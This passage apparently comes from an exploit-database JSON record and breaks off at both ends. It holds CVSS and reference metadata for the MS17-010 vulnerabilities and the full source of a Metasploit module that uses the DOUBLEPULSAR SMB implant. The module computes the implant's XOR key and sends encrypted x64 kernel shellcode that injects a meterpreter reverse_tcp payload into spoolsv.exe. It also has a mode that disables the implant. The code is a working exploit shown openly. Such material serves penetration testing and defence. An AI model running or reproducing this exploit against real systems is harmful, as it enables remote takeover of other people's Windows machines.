"SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-20T08:18:11", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-20T08:18:11", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-20] #"}, "lastseen": "2021-10-20T08:18:11", "differentElements": ["sourceData"], "edition": 50}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "d3fdad89b4c30a44700641362e5d8b99", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-20T22:23:49", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-20T22:23:49", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-20T22:23:49", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
